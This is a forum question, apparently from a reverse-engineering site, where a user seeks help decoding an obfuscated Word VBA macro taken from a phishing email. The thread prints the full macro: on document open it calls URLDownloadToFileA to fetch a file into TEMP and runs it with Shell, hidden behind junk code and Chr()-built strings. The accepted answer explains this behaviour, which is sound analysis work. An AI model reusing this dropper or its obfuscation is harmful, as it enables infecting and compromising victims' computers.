# Deobfuscate office VBA code (malware)

Tags: malware, obfuscation

I have been sent a malicious email and I am trying to figure out what the malicious code does.

I have managed to find the payload by decrypting the `Chr()` values, but the rest of the code is unrecognizable:

```
'xsWChLNzlXVGlYZFbEhKDOzjNBrFZHSIl

'DpcvleMuqWiFyl
'hyaTdAKzoQinNr


#If VBA7 Then
Private Declare PtrSafe Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
Private Declare PtrSafe Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal LGXqVWHEnKiVcwaykFTVOtoYnoTDLwWaNw As Long, ByVal KftlkyaxsIGlyvxXaRq As String, ByVal tEMWFoNKZputSPQzVOtoYnoTDLwWaNw As String, ByVal VOtoYnoTDLwWaNwelVYixgTcfwsAmLJelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJVOtoYnoTDLwWaNw As Long) As Long
Private Declare PtrSafe Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
Private Declare PtrSafe Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
#Else
Private Declare Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
Private Declare Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal eaNkjdOHzsdMqQQJj As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJ As String, ByVal hyaTdAKzoQinNr As String, ByVal oclNInPDShbETYbnelVYixgTcfwsAmLJ As Long, ByVal MoJTLPWYmfKTgbzoclNInPDShbETYbn As Long) As Long
Private Declare Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUb As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
Private Declare Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
#End If

Function tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
End If
End Function
Function hbnTqBUKPuGRJiqWZCx(ByVal AEbtrIvLZRPbVNfgVj As String, ByVal hUfrAbrdnkOdGp As String)
If PSUWksxjZPfDYLXwvxT = rMDsWrTugbpcOBHF Then
PYcyaTaPAZYqaEfo = ZPrnJJzqaCCtqvTbUx
'cbxeKGrLfUwXefANSyFxsWChLNzlXVGlYZZPrnJJzqaCCtqvTbUx
ZPrnJJzqaCCtqvTbUx = PSUWksxjZPfDYLXwvxT
End If
VQBzUNhAGAtJOoF 4 - 2 - 2 + 0 + 0, AEbtrIvLZRPbVNfgVj, hUfrAbrdnkOdGp, -4 + 4 + 100 - 100, 0 + 2 - 2
kulqYfDfxsawQDJKs = tyfevPUzZSHNUpjY
End Function


'Dim GwBumCCwetkuJxFBCpItkYuBQhYPrTgw as Boolean
Private Sub VOtoYnoTDLwWaNw()
iCQYbaBRKwhBnk = lhkiLXZpbeIyqeoYYT
kblSRXpqDJMxcL = DBjnUFZaqAWuPymnej(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(Asc(w)) + Chr(Asc(l)) + Chr(98) + Chr(100) + Chr(111) + Chr(Asc(c)) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(Asc(o)) + Chr(Asc(p)) + Chr(46) + Chr(Asc(a)) + Chr(Asc()) + Chr(Asc()) + Chr(Asc()) + Chr(115) + Chr(Asc(p)) + Chr(116) + Chr(116) + Chr(104))

If AEbtrIvLZRPbVN = ZDkwQiwTpwOOdeofW Then
SqgFeQsbOnOMZMke = dhwvEFcKDpsYsyJeZg
lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
End If

ZKsXGJZRFGCfXvXP = DBjnUFZaqAWuPymnej(ctsalal)

If vMtgBnwtQByVtExPHr = rSCIQrDtFvkdcUGB Then
iTWgFywkvRqSPai = ZUqEtJtyPvyDIJuP
End If

VJtYenETeqAVMuxRbDY = Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) & ZKsXGJZRFGCfXvXP

If jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
End If

hbnTqBUKPuGRJiqWZCx kblSRXpqDJMxcL, VJtYenETeqAVMuxRbDY 'if jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then

Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY As Currency

Call Shell(VJtYenETeqAVMuxRbDY, vbNormalFocus) ' Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY as Integer
QVKciSoAuvfQxE = WIlNjMLmbBEiXU
End Sub

Sub Document_Open()
VOtoYnoTDLwWaNw 'kulqYfDfxsawQDJKstyfevPUzZSHNUpjY
End Sub

Private Function EoUkpEUNnhmSKLKUmtAYNRreSwhjqjV(ByVal FbEhKDOzjNBrFZHSIlEoUkpEUNnhmSKL As String)
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV


If KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL Then
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV

Dim FbEhKDOzjNBrFZHSIl As Currency

End If

End Function

Private Sub eIZAqeJRzrTIWdkoMI()
oFxRFuVhRCqIsfBH = MRVXJWcClZWEiZqHHU
End Sub

Private Function DBjnUFZaqAWuPymnej(lJWzsWzeaVgVJGa)
If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
End If
    DBjnUFZaqAWuPymnej = StrReverse(lJWzsWzeaVgVJGa)

If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL
End If
End Function

Function GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
End If
End Function
```

What methods can I use to decrypt/decode the below code in order to understand what it does.

I have tried the `oledump.py` script found [here](https://blog.didierstevens.com/programs/oledump-py), but to no avail.

Highlighted code can be seen here: http://pastebin.com/YDqk3BbM

Comment: Unfortunately, we can't perform code analysis on all the random code out there. We'd end up a library of randomness. There is an existing question that will help with methods, though.

Comment: A simple first step would be to use a text editor to search-and-replace the random strings defined to be aliases to normal function names in the first few dozen lines.

Comment: Do you mean some strings that match and call them all "function a" then find the next matching set and call them "function b" etc...?

Answer (score 2, accepted):

`VQBzUNhAGAtJOoF` is an alias for `URLDownloadToFileA`

`Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30)` is equal to `"TEMP\"`

Usually these scripts are all the same: they download an executable from the Internet into the TEMP folder and execute it (using the `Shell` statement in this code).

That executable is the actual malicious code.

Comment: Thank you, as I suspected. I have already identified the exe. I will focus my efforts on that.

Comment: @Jeff how you decode? Thanks  Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30)